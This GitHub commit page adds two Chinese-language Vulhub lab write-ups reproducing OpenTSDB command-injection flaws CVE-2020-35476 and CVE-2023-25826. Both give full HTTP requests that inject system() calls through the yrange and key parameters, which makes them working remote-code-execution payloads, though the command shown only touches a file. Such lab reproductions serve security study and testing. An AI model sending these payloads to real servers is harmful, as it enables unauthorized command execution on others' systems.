-
Notifications
You must be signed in to change notification settings - Fork 322
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
update opentsdb cve-2020-35476 & cve-2023-25826
- Loading branch information
Showing
19 changed files
with
196 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
# OpenTSDB 命令注入漏洞 CVE-2020-35476 | ||
|
||
## 漏洞描述 | ||
|
||
OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。在其 2.4.0 版本及之前,存在一处命令注入漏洞。 | ||
|
||
参考链接: | ||
|
||
- [OpenTSDB/opentsdb#2051](https://github.com/OpenTSDB/opentsdb/issues/2051) | ||
- [https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html) | ||
|
||
## 环境搭建 | ||
|
||
Vulhub 执行如下命令启动一个 OpenTSDB 2.4.0: | ||
|
||
``` | ||
docker compose up -d | ||
``` | ||
|
||
服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。 | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165806970.png) | ||
|
||
## 漏洞复现 | ||
|
||
利用这个漏洞需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表: | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165830409.png) | ||
|
||
这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以我们可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录: | ||
|
||
``` | ||
POST /api/put/ HTTP/1.1 | ||
Host: your-ip:4242 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Accept-Language: en | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
Content-Type: application/x-www-form-urlencoded | ||
Connection: close | ||
Content-Length: 150 | ||
{ | ||
"metric": "sys.cpu.nice", | ||
"timestamp": 1346846400, | ||
"value": 20, | ||
"tags": { | ||
"host": "web01", | ||
"dc": "lga" | ||
} | ||
} | ||
``` | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165935912.png) | ||
|
||
如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。再次查看 metric 列表,metric 已经创建完成: | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170059167.png) | ||
|
||
发送如下数据包,其中参数`m`的值必须包含一个有数据的 metric: | ||
|
||
``` | ||
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1 | ||
Host: your-ip:4242 | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Accept-Language: en | ||
Connection: close | ||
``` | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170532492.png) | ||
|
||
进入容器中可见 `touch /tmp/awesome_poc` 已成功执行: | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170625205.png) |
104 changes: 104 additions & 0 deletions
104
docs-base/docs/vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,104 @@ | ||
# OpenTSDB 命令注入漏洞 CVE-2023-25826 | ||
|
||
## 漏洞描述 | ||
|
||
OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。 2.4.1 版本及之前,存在一处命令注入漏洞。 这个漏洞其实是对之前的 CVE-2020-35476 修复不完善导致的,所以整个复现过程也与之前类似。 | ||
|
||
参考链接: | ||
|
||
- [https://www.synopsys.com/blogs/software-security/opentsdb/](https://www.synopsys.com/blogs/software-security/opentsdb/) | ||
- [OpenTSDB/opentsdb#2275](https://github.com/OpenTSDB/opentsdb/pull/2275) | ||
|
||
## 环境搭建 | ||
|
||
Vulhub 执行如下命令启动一个 OpenTSDB 2.4.1: | ||
|
||
``` | ||
docker-compose up -d | ||
``` | ||
|
||
服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。 | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171841166.png) | ||
|
||
## 漏洞复现 | ||
|
||
这之前的都和 CVE-2020-35476 一致,也是需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表。 | ||
|
||
这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以也可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录: | ||
|
||
``` | ||
POST /api/put/ HTTP/1.1 | ||
Host: your-ip:4242 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Accept-Language: en | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
Content-Type: application/x-www-form-urlencoded | ||
Connection: close | ||
Content-Length: 150 | ||
{ | ||
"metric": "sys.cpu.nice", | ||
"timestamp": 972388800, | ||
"value": 20, | ||
"tags": { | ||
"host": "web01", | ||
"dc": "lga" | ||
} | ||
} | ||
``` | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171931111.png) | ||
|
||
如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。 | ||
|
||
发送 CVE-2020-35476 payload : | ||
|
||
``` | ||
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1 | ||
Host: your-ip:4242 | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Accept-Language: en | ||
Connection: close | ||
``` | ||
|
||
将返回错误: | ||
|
||
``` | ||
{"err":"'yrange' was invalid. Must be in the format [min:max]."} | ||
``` | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172116456.png) | ||
|
||
CVE-2023-25826 绕过修复的一个点,在参数 key 这里: | ||
|
||
```shell | ||
# CVE-2020-35476 | ||
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json | ||
|
||
# CVE-2023-25826 | ||
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json | ||
``` | ||
|
||
发送数据包: | ||
|
||
``` | ||
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1 | ||
Host: your-ip:4242 | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Accept-Language: en | ||
Connection: close | ||
``` | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172238155.png) | ||
|
||
进入容器中可见 `touch /tmp/awesome_poc` 已成功执行: | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172321376.png) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Binary file added
BIN
+165 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307165806970.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+45.5 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307165830409.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+121 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307165935912.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+48.2 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307170059167.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+130 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307170532492.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+48.8 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307170625205.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+167 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307171841166.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+47.2 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307171931111.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+118 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172057803.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+118 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172116456.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+131 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172238155.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added
BIN
+47.9 KB
...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172321376.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.